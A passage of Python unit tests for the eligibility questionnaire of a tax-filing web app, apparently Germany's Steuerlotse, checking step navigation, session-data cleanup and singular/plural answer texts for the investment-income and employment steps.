self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.investment_income.yes', 'form.eligibility.investment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.investment_income.no', 'form.eligibility.investment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.investment_income_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.investment_income.yes', 'form.eligibility.investment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.investment_income.no', 'form.eligibility.investment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.investment_income_eligibility.choices)
class TestMinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'minimal_investment_income_eligibility': 'yes'}))
expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'minimal_investment_income_eligibility': 'no'}))
expected_url = step.url_for_step(TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes'}
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.minimal_investment_income.yes', 'form.eligibility.minimal_investment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.minimal_investment_income.no', 'form.eligibility.minimal_investment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.minimal_investment_income_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.minimal_investment_income.yes', 'form.eligibility.minimal_investment_income.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.minimal_investment_income.no', 'form.eligibility.minimal_investment_income.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.minimal_investment_income_eligibility.choices)
class TestTaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestTaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'yes'}))
expected_url = step.url_for_step(CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'no'}))
expected_url = step.url_for_step(TaxedInvestmentIncomeEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'taxed_investment_income_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no'}
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestCheaperCheckEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = CheaperCheckEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=CheaperCheckEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestCheaperCheckDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'no'}))
expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'yes'}))
expected_url = step.url_for_step(CheaperCheckEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'cheaper_check_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.cheaper_check_eligibility.yes', 'form.eligibility.cheaper_check_eligibility.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.cheaper_check_eligibility.no', 'form.eligibility.cheaper_check_eligibility.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.cheaper_check_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.cheaper_check_eligibility.yes', 'form.eligibility.cheaper_check_eligibility.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.cheaper_check_eligibility.no', 'form.eligibility.cheaper_check_eligibility.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.cheaper_check_eligibility.choices)
class TestEmploymentDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'employment_income_eligibility': 'no'}))
expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'employment_income_eligibility': 'yes'}))
expected_url = step.url_for_step(MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_incomes_but_no_cheaper_check_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(CheaperCheckDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_incomes_but_minimal_investment_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {**self.correct_session_data.copy(), **{'minimal_investment_income_eligibility': 'yes'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_no_incomes_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {**self.correct_session_data.copy(), **{'investment_income_eligibility': 'no'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
EmploymentDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'employment_income_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'no',
'cheaper_check_eligibility': 'no',
'employment_income_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
